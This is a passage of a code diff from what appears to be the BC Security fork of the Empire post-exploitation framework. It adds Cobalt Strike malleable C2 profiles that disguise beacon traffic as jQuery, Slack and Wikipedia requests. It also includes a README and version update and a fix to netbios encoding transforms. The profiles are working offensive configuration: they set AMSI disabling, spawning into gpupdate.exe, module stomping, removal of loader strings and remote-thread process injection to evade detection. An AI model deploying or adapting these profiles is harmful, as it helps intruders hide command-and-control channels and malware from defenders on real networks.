define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
604 print;
605 }
606 }
607 }
608
609 ## Use HTTP GET for http-post section
610 ## Uncomment this Section to activate
611 # http-post {
612
613 # set uri "/jquery-3.3.2.min.js";
614 # set verb "GET";
615
616 # client {
617
618 # header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
619 # #header "Host" "code.jquery.com";
620 # header "Referer" "http://code.jquery.com/";
621 # header "Accept-Encoding" "gzip, deflate";
622
623 # id {
624 # mask;
625 # base64url;
626 # parameter "__cfduid";
627 # }
628
629 # output {
630 # mask;
631 # base64url;
632 # parameter "__tg";
633 # }
634 # }
635
636 # server {
637
638 # header "Server" "NetDNA-cache/2.2";
639 # header "Cache-Control" "max-age=0, no-cache";
640 # header "Pragma" "no-cache";
641 # header "Connection" "keep-alive";
642 # header "Content-Type" "application/javascript; charset=utf-8";
643
644 # output {
645 # mask;
646 # base64url;
647 # ## The javascript was changed. Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
648 # # 2nd Line
649 # prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";
650 # # 1st Line
651 # prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
652 # append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
653 # print;
654 # }
655 # }
656 # }
657
658 ## CS 4.0 Profile Variants
659 ## Variants are selectable when configuring an HTTP or HTTPS Beacon listener. Variants allow each HTTP or HTTPS Beacon listener tied to a single team server to have network IOCs that differ from each other.
660 ## You may add profile "variants" by specifying additional http-get, http-post, http-stager, and https-certifcate blocks with the following syntax:
661 ## [block name] "variant name" { ... }. Here's a variant http-get block named "My Variant":
662 ## http-get "My Variant" {
663 ## client {
664 ## parameter "bar" "blah";
665
+281
-0
data/profiles/Normal/slack.profile less more
0 #slack profile
1 #used a MS dev group from a 'top slack groups' list
2 #xx0hcd
3
4
5 set sleeptime "30000";
6 set jitter "20";
7 set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)";
8 set dns_idle "8.8.8.8";
9 set maxdns "235";
10
11 #custom cert
12 #https-certificate {
13 # set keystore "your_store_file.store";
14 # set password "your_store_pass";
15 #}
16
17 http-config {
18 # set headers "Server, Content-Type, Cache-Control, Connection";
19 # header "Content-Type" "text/html;charset=UTF-8";
20 # header "Connection" "close";
21 # header "Cache-Control" "max-age=2";
22 # header "Server" "nginx";
23 #set "true" if teamserver is behind redirector
24 set trust_x_forwarded_for "false";
25 }
26
27 http-get {
28
29 set uri "/messages/C0527B0NM";
30
31 client {
32
33 # header "Host" "msdevchat.slack.com";
34 header "Accept" "*/*";
35 header "Accept-Language" "en-US";
36 header "Connection" "close";
37
38
39 metadata {
40 base64url;
41
42 append ";_ga=GA1.2.875";
43 append ";__ar_v4=%8867UMDGS643";
44 prepend "d=";
45 # prepend "cvo_sid1=R456BNMD64;";
46 prepend "_ga=GA1.2.875;";
47 prepend "b=.12vPkW22o;";
48 header "Cookie";
49
50 }
51
52 }
53
54 server {
55
56 header "Content-Type" "text/html; charset=utf-8";
57 header "Connection" "close";
58 header "Server" "Apache";
59 header "X-XSS-Protection" "0";
60 header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload";
61 header "Referrer-Policy" "no-referrer";
62 header "X-Slack-Backend" "h";
63 header "Pragma" "no-cache";
64 header "Cache-Control" "private, no-cache, no-store, must-revalidate";
65 header "X-Frame-Options" "SAMEORIGIN";
66 header "Vary" "Accept-Encoding";
67 header "X-Via" "haproxy-www-w6k7";
68
69
70 output {
71
72 base64url;
73
74 prepend "<!DOCTYPE html>
75 <html lang=\"en-US\" class=\"supports_custom_scrollbar\">
76
77 <head>
78
79 <meta charset=\"utf-8\">
80 <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\">
81 <meta name=\"referrer\" content=\"no-referrer\">
82 <meta name=\"superfish\" content=\"nofish\">
83 <title>Microsoft Developer Chat Slack</title>
84 <meta name=\"author\" content=\"Slack\">
85
86
87 <link rel=\"dns-prefetch\" href=\"https://a.slack-edge.com?id=";
88
89 append "\"> </script>";
90
91 append "<div id=\"client-ui\" class=\"container-fluid sidebar_theme_\"\"\">
92
93
94 <div id=\"banner\" class=\"hidden\" role=\"complementary\" aria-labelledby=\"notifications_banner_aria_label\">
95 <h1 id=\"notifications_banner_aria_label\" class=\"offscreen\">Notifications Banner</h1>
96
97 <div id=\"notifications_banner\" class=\"banner sk_fill_blue_bg hidden\">
98 Slack needs your permission to <button type=\"button\" class=\"btn_link\">enable desktop notifications</button>. <button type=\"button\" class=\"btn_unstyle banner_dismiss ts_icon ts_icon_times_circle\" data-action=\"dismiss_banner\" aria-label=\"Dismiss\"></button>
99 </div>
100
101 <div id=\"notifications_dismiss_banner\" class=\"banner seafoam_green_bg hidden\">
102 We strongly recommend enabling desktop notifications if you’ll be using Slack on this computer. <span class=\"inline_block no_wrap\">
103 <button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.close(); TS.ui.banner.growlsPermissionPrompt();\">Enable notifications</button> •
104 <button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.close()\">Ask me next time</button> •
105 <button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.closeNagAndSetCookie()\">Never ask again on this computer</button>
106 </span>
107 </div>";
108
109 print;
110 }
111 }
112 }
113
114 http-post {
115
116 set uri "/api/api.test";
117
118 client {
119
120 # header "Host" "msdevchat.slack.com";
121 header "Accept" "*/*";
122 header "Accept-Language" "en-US";
123
124 output {
125 base64url;
126
127 append ";_ga=GA1.2.875";
128 append "__ar_v4=%8867UMDGS643";
129 prepend "d=";
130 # prepend "cvo_sid1=R456BNMD64;";
131 prepend "_ga=GA1.2.875;";
132 prepend "b=.12vPkW22o;";
133 header "Cookie";
134
135
136 }
137
138
139 id {
140 #not sure on this, just trying to blend it in.
141 base64url;
142 prepend "GA1.";
143 header "_ga";
144
145 }
146 }
147
148 server {
149
150 header "Content-Type" "application/json; charset=utf-8";
151 header "Connection" "close";
152 header "Server" "Apache";
153 header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload";
154 header "Referrer-Policy" "no-referrer";
155 header "X-Content-Type-Options" "nosniff";
156 header "X-Slack-Req-Id" "6319165c-f976-4d0666532";
157 header "X-XSS-Protection" "0";
158 header "X-Slack-Backend" "h";
159 header "Vary" "Accept-Encoding";
160 header "Access-Control-Allow-Origin" "*";
161 header "X-Via" "haproxy-www-6g1x";
162
163
164 output {
165 base64;
166
167 prepend "{\"ok\":true,\"args\":{\"user_id\":\"LUMK4GB8C\",\"team_id\":\"T0527B0J3\",\"version_ts\":\"";
168 append "\"},\"warning\":\"superfluous_charset\",\"response_metadata\":{\"warnings\":[\"superfluous_charset\"]}}";
169
170 print;
171 }
172 }
173 }
174
175 http-stager {
176
177 set uri_x86 "/messages/DALBNSf25";
178 set uri_x64 "/messages/DALBNSF25";
179
180 client {
181 header "Accept" "*/*";
182 header "Accept-Language" "en-US,en;q=0.5";
183 header "Accept-Encoding" "gzip, deflate";
184 header "Connection" "close";
185 }
186
187 server {
188 header "Content-Type" "text/html; charset=utf-8";
189 header "Connection" "close";
190 header "Server" "Apache";
191 header "X-XSS-Protection" "0";
192 header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload";
193 header "Referrer-Policy" "no-referrer";
194 header "X-Slack-Backend" "h";
195 header "Pragma" "no-cache";
196 header "Cache-Control" "private, no-cache, no-store, must-revalidate";
197 header "X-Frame-Options" "SAMEORIGIN";
198 header "Vary" "Accept-Encoding";
199 header "X-Via" "haproxy-www-suhx";
200
201 }
202
203
204 }
205
206 ###Malleable PE Options###
207
208 post-ex {
209
210 set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
211 set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
212
213 set obfuscate "true";
214
215 set smartinject "true";
216
217 set amsi_disable "true";
218
219 }
220
221 #used peclone on wwanmm.dll.
222 #don't use 'set image_size_xx' if using 'set module_xx'
223 stage {
224 set checksum "0";
225 set compile_time "25 Oct 2016 01:57:23";
226 set entry_point "170000";
227 # set image_size_x86 "6586368";
228 # set image_size_x64 "6586368";
229 # set name "WWanMM.dll";
230 set userwx "false";
231 set cleanup "true";
232 set stomppe "true";
233 set obfuscate "true";
234 set rich_header "\xee\x50\x19\xcf\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xaa\x31\x77\x9c\xa3\x49\xe4\x9c\x84\x31\x77\x9c\x1e\xad\x86\x9c\xae\x31\x77\x9c\x1e\xad\x85\x9c\xa7\x31\x77\x9c\xaa\x31\x76\x9c\x08\x31\x77\x9c\x1e\xad\x98\x9c\xa3\x31\x77\x9c\x1e\xad\x84\x9c\x98\x31\x77\x9c\x1e\xad\x99\x9c\xab\x31\x77\x9c\x1e\xad\x80\x9c\x6d\x31\x77\x9c\x1e\xad\x9a\x9c\xab\x31\x77\x9c\x1e\xad\x87\x9c\xab\x31\x77\x9c\x52\x69\x63\x68\xaa\x31\x77\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
235
236
237 #module stomp
238
239 #don't use 'set image_size_xx' if using 'set module_xx'
240 set module_x86 "wwanmm.dll";
241 set module_x64 "wwanmm.dll";
242
243 transform-x86 {
244 prepend "\x90\x90\x90";
245 strrep "ReflectiveLoader" "";
246 strrep "beacon.dll" "";
247 }
248
249 transform-x64 {
250 prepend "\x90\x90\x90";
251 strrep "ReflectiveLoader" "";
252 strrep "beacon.x64.dll" "";
253 }
254
255 }
256 process-inject {
257
258 set allocator "NtMapViewOfSection";
259
260 set min_alloc "16700";
261
262 set userwx "false";
263
264 set startrwx "true";
265
266 transform-x86 {
267 prepend "\x90\x90\x90";
268 }
269 transform-x64 {
270 prepend "\x90\x90\x90";
271 }
272
273 execute {
274 CreateThread "ntdll!RtlUserThreadStart";
275 CreateThread;
276 NtQueueApcThread;
277 CreateRemoteThread;
278 RtlCreateUserThread;
279 }
280 }
+123
-0
data/profiles/Normal/wikipedia_getonly.profile less more
0 #
1 # Wikipedia
2 #
3 # Author: @bluscreenofjeff
4 #
5
6 #set https cert info
7 https-certificate {
8 set CN "*.wikipedia.org"; #Common Name
9 set C "US"; #Country
10 set L "San Francisco"; #Locality
11 set OU "Wikimedia Foundation Inc"; #Organizational Unit Name
12 set ST "CA"; #State or Province
13 set validity "365"; #Number of days the cert is valid for
14 }
15
16 #default Beacon sleep duration and jitter
17 set sleeptime "60000";
18 set jitter "20";
19
20 #default useragent for HTTP comms
21 set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
22
23 #IP address used to indicate no tasks are available to DNS Beacon
24 set dns_idle "8.8.4.4";
25
26 #Force a sleep prior to each individual DNS request. (in milliseconds)
27 set dns_sleep "0";
28
29 #Maximum length of hostname when uploading data over DNS (0-255)
30 set maxdns "235";
31
32 http-get {
33
34 set uri "/w/index.php";
35
36 client {
37
38 header "Host" "en.wikipedia.org";
39 header "Accept" "text/html,application/xhtml+xml,application/xml;";
40 header "Referer" "https://en.wikipedia.org/wiki/Main_Page";
41
42 #session metadata
43 metadata {
44 base64url;
45 parameter "search";
46 }
47 parameter "title" "Special%3ASearch";
48 parameter "go" "Go";
49 }
50
51
52 server {
53
54 header "Server" "mw1178.eqiad.wmnet";
55 header "X-Powered-By" "HHVM/3.12.7";
56 header "X-Content-Type-Options" "nosniff";
57 header "P3P" "CP=This is not a P3P policy! See https://en.wikipedia.org/wiki/Special:CentralAutoLogin/P3P for more info.";
58 header "Vary" "Accept-Encoding,X-Forwarded-Proto,Cookie,Authorization";
59
60 #Beacon's tasks
61 output {
62 netbios;
63 prepend "<!DOCTYPE html><html class=client-nojs lang=en dir=ltr><head><meta charset=UTF-8/><title>Wikipedia</title><script>document.documentElement.className = document.documentElement.className.replace( /(^|s)client-nojs(s|$)/, $1client-js$2 );</script><script>(window.RLQ=window.RLQ||[]).push(function(){mw.config.set({wgCanonicalNamespace:,wgCanonicalSpecialPageName:false,wgNamespaceNumber:0,,wgBetaFeaturesFeatures:[],wgMediaViewerOnClick:true,wgMediaViewerEnabledByDefault:true,wgVisualEditor:{pageLanguageCode:en,pageLanguageDir:ltr,usePageImages:true,usePageDescriptions:true},wgPreferredVariant:en,wgMFDisplayWikibaseDescriptions:{search:true,nearby:true,watchlist:true,tagline:false},wgRelatedArticles:null,wgRelatedArticlesUseCirrusSearch:true,wgRelatedArticlesOnlyUseCirrusSearch:false,wgULSCurrentAutonym:English,wgNoticeProject:wikipedia,wgCentralNoticeCookiesToDelete:[],wgCentralNoticeCategoriesUsingLegacy:[Fundraising,fundraising],wgCategoryTreePageCategoryOptions:{mode:0,hideprefix:20,showcount:true,namespaces:false},wgWikibaseItemId:";
64
65 append ",wgCentralAuthMobileDomain:false,wgVisualEditorToolbarScrollOffset:0,wgEditSubmitButtonLabelPublish:false});mw.loader.state({ext.globalCssJs.user.styles:ready,ext.globalCssJs.site.styles:ready,site.styles:ready,noscript:ready,user.styles:ready,user:ready,user.options:loading,user.tokens:loading,wikibase.client.init:ready,ext.visualEditor.desktopArticleTarget.noscript:ready,ext.uls.interlanguage:ready,ext.wikimediaBadges:ready,mediawiki.legacy.shared:ready,mediawiki.legacy.commonPrint:ready,mediawiki.sectionAnchor:ready,mediawiki.skinning.interface:ready,skins.vector.styles:ready,ext.globalCssJs.user:ready,ext.globalCssJs.site:ready});mw.loader.implement(user.options@0j3lz3q,function($,jQuery,require,module){mw.user.options.set({variant:en});});mw.loader.implement(user.tokens@1dqfd7l,function ( $, jQuery, require, module )</script><link rel=stylesheet href=/w/load.php?debug=false&amp;lang=en&amp;modules=ext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cmediawiki.legacy.commonPrint%2Cshared%7Cmediawiki.sectionAnchor%7Cmediawiki.skinning.interface%7Cskins.vector.styles%7Cwikibase.client.init&amp;only=styles&amp;skin=vector/><script async= src=/w/load.php?debug=false&amp;lang=en&amp;modules=startup&amp;only=scripts&amp;skin=vector></script><meta name=ResourceLoaderDynamicStyles content=/><link rel=stylesheet href=/w/load.php?debug=false&amp;lang=en&amp;modules=site.styles&amp;only=styles&amp;skin=vector/>";
66
67 print;
68 }
69 }
70 }
71
72 http-post {
73
74 set uri "/wiki";
75 set verb "GET";
76
77 client {
78
79 header "Host" "en.wikipedia.org";
80 header "Accept" "text/html,application/xhtml+xml,application/xml;";
81
82 #session ID
83 id {
84 base64url;
85 prepend "/";
86 uri-append;
87 }
88
89
90 #Beacon's responses
91 output {
92 base64url;
93 prepend "https://en.wikipedia.org/w/index.php?search=";
94 append "&title=Special%3ASearch&go=Go";
95 header "Referer";
96 }
97 }
98
99 server {
100
101 header "Server" "mw1178.eqiad.wmnet";
102 header "X-Powered-By" "HHVM/3.12.7";
103 header "X-Content-Type-Options" "nosniff";
104 header "P3P" "CP=This is not a P3P policy! See https://en.wikipedia.org/wiki/Special:CentralAutoLogin/P3P for more info.";
105 header "Vary" "Accept-Encoding,X-Forwarded-Proto,Cookie,Authorization";
106
107 #empty
108 output {
109
110 prepend "<body class=mediawiki ltr sitedir-ltr mw-hide-empty-elt ns-0 ns-subject page-Test rootpage-Test skin-vector action-view><div id=mw-page-base class=noprint></div><div id=mw-head-base class=noprint></div><div id=content class=mw-body role=main><a id=top></a><div id=siteNotice><!-- CentralNotice --></div><div class=mw-indicators><div id=mw-indicator-pp-default class=mw-indicator><a href=/wiki/Wikipedia:Protection_policy#semi title=This article is semi-protected due to vandalism><img alt=Page semi-protected src=//upload.wikimedia.org/wikipedia/commons/thumb/f/fc/Padlock-silver.svg/20px-Padlock-silver.svg.png width=20 height=20 srcset=//upload.wikimedia.org/wikipedia/commons/thumb/f/fc/Padlock-silver.svg/30px-Padlock-silver.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/f/fc/Padlock-silver.svg/40px-Padlock-silver.svg.png 2x data-file-width=128 data-file-height=128 /></a></div></div><h1 id=firstHeading class=firstHeading lang=en>Wikipedia</h1><div id=bodyContent class=mw-body-content><div id=siteSub>From Wikipedia, the free encyclopedia</div><div id=contentSub><span class=mw-redirectedfrom>ᅡᅠᅡᅠ(Redirected from <a href=/w/index.php?title=Testing&amp;redirect=no class=mw-redirect title=Testing>Testing</a>)</span></div><div id=jump-to-nav class=mw-jump>Jump to:<a href=#mw-head>navigation</a>,<a href=#p-search>search</a></div><div id=mw-content-text lang=en dir=ltr class=mw-content-ltr><script>function mfTempOpenSection(id){var block=document.getElementById(mf-section-+id);block.className+= open-block;block.previousSibling.className+= open-block;}</script><table class=plainlinks metadata ambox ambox-content role=presentation><tr><td class=mbox-image><div style=width:52px><img alt= src=//upload.wikimedia.org/wikipedia/commons/thumb/e/e9/Sandbox_Not.svg/50px-Sandbox_Not.svg.png width=50 height=50 srcset=//upload.wikimedia.org/wikipedia/commons/thumb/e/e9/Sandbox_Not.svg/75px-Sandbox_Not.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/e/e9/Sandbox_Not.svg/100px-Sandbox_Not.svg.png 2x data-file-width=766 data-file-height=766 /></div></td>";
111
112 print;
113 }
114 }
115 }
116
117 #change the stager server
118 http-stager {
119 server {
120 header "Content-Type" "text/html";
121 }
122 }
+2
-2
data/profiles/README.md less more
1414 - [threatexpress](https://github.com/threatexpress/malleable-c2)
1515 - [yeyintminthuhtut](https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection)
1616 - [bluscreenofjeff](https://github.com/bluscreenofjeff/MalleableC2Profiles)
17 - [skgray](https://github.com//Malleable-C2)
1817 - [mhaskar](https://github.com/mhaskar/MalleableC2-Profiles)
1918
2019 ## Documentation
2120 - [A Deep Dive into Cobalt Strike Malleable C2](https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b)
22 - [Malleable C2 Documenation](https://www.cobaltstrike.com/help-malleable-c2)
21 - [Malleable C2 Documentation](https://www.cobaltstrike.com/help-malleable-c2)
22 - [Empire: Malleable C2 Profiles](https://www.bc-security.org/post/empire-malleable-c2-profiles/)
+1
-1
lib/common/empire.py less more
1818 from datetime import datetime, timezone
1919 from flask_socketio import SocketIO
2020
21 VERSION = "3.7.1 BC Security Fork"
21 VERSION = "3.7.2 BC Security Fork"
2222
2323 from pydispatch import dispatcher
2424
+23
-13
lib/common/malleable/transformation.py less more
271271 netbios algorithm."""
272272 self.transform = lambda data: netbios_transform(data)
273273 self.transform_r = lambda data: netbios_transform_r(data)
274 self.generate_python = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr((f_ord(_)>>4)+0x61)+chr((f_ord(_)&0xF)+0x61) for _ in %(var)s])\n" % {"var":var}
275 self.generate_python_r = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr(((f_ord(%(var)s[_])-0x61)<<4)|((f_ord(%(var)s[_+1])-0x61)&0xF)) for _ in range(0,len(%(var)s),2)])\n" % {"var":var}
276 self.generate_powershell = lambda var: netbios_powershell(var)
277 self.generate_powershell_r = lambda var: netbios_powershell_r(var)
274278
275279 def netbios_transform(data):
276280 if isinstance(data, str):
284288 r = "".join([chr(((data[i]-0x61)<<4)|((data[i+1]-0x61)&0xF)) for i in range(0, len(data), 2)])
285289 return r.encode('latin-1')
286290
287 self.generate_python = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr((f_ord(_)>>4)+0x61)+chr((f_ord(_)&0xF)+0x61) for _ in %(var)s])\n" % {"var":var}
288 self.generate_python_r = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr(((f_ord(%(var)s[_])-0x61)<<4)|((f_ord(%(var)s[_+1])-0x61)&0xF)) for _ in range(0,len(%(var)s),2)])\n" % {"var":var}
289 self.generate_powershell = lambda var: "%(var)s=[System.Text.Encoding]::Default.GetString($(for($_=0;$_ -lt %(var)s.length;$_++){([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_] -shr 4)+97;([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_] -band 15)+97;}));" % {"var":var}
290 self.generate_powershell_r = lambda var: "%(var)s=[System.Text.Encoding]::Default.GetString($(for($_=0;$_ -lt %(var)s.length;$_+=2){(([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_]-97) -shl 4) -bor (([System.Text.Encoding]::Default.GetBytes(%(var)s)[$_+1]-97) -band 15);}));" % {"var":var}
291 def netbios_powershell(var):
292 return "$data2=[System.Text.Encoding]::Default.GetBytes(%(var)s);%(var)s=[System.Text.Encoding]::Default.GetString($(for($i=0;$i -lt %(var)s.Length;$i++){($data2[$i] -shr 4)+97;($data2[$i] -band 15)+97;}));" % {"var": var}
293
294 def netbios_powershell_r(var):
295 return "$data2=[System.Text.Encoding]::Default.GetBytes(%(var)s);%(var)s=[System.Text.Encoding]::Default.GetString($(for($i=0;$i -lt %(var)s.Length;$i+=2){($data2[$i]-97 -shl 4) -bor ($data2[$i+1]-97 -band 15);}));" % {"var":var}
291296
292297 def _netbiosu(self):
293298 """Configure the `netbiosu` Transform, which encodes an arbitrary input using the upper-case
294299 netbios algorithm."""
295 self.transform = lambda data: netbios_transform(data)
296 self.transform_r = lambda data: netbios_transform_r(data)
297
298 def netbios_transform(data):
300 self.transform = lambda data: netbiosu_transform(data)
301 self.transform_r = lambda data: netbiosu_transform_r(data)
302 self.generate_python = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr((f_ord(_)>>4)+0x41)+chr((f_ord(_)&0xF)+0x41) for _ in %(var)s])\n" % {"var":var}
303 self.generate_python_r = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr(((f_ord(%(var)s[_])-0x41)<<4)|((f_ord(%(var)s[_+1])-0x41)&0xF)) for _ in range(0,len(%(var)s),2)])\n" % {"var":var}
304 self.generate_powershell = lambda var: netbiosu_powershell(var)
305 self.generate_powershell_r = lambda var: netbiosu_powershell_r(var)
306
307 def netbiosu_transform(data):
299308 if isinstance(data, str):
300309 data = data.encode('latin-1')
301310 r = "".join([chr((c>>4)+0x41)+chr((c&0xF)+0x41) for c in data])
302311 return r.encode('latin-1')
303312
304 def netbios_transform_r(data):
313 def netbiosu_transform_r(data):
305314 if isinstance(data, str):
306315 data = data.encode('latin-1')
307316 r = "".join([chr(((data[i]-0x41)<<4)|((data[i+1]-0x41)&0xF)) for i in range(0, len(data), 2)])
308317 return r.encode('latin-1')
309318
310 self.generate_python = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr((f_ord(_)>>4)+0x41)+chr((f_ord(_)&0xF)+0x41) for _ in %(var)s])\n" % {"var":var}
311 self.generate_python_r = lambda var: "f_ord=ord if __import__('sys').version_info[0]<3 else int;%(var)s=''.join([chr(((f_ord(%(var)s[_])-0x41)<<4)|((f_ord(%(var)s[_+1])-0x41)&0xF)) for _ in range(0,len(%(var)s),2)])\n" % {"var":var}
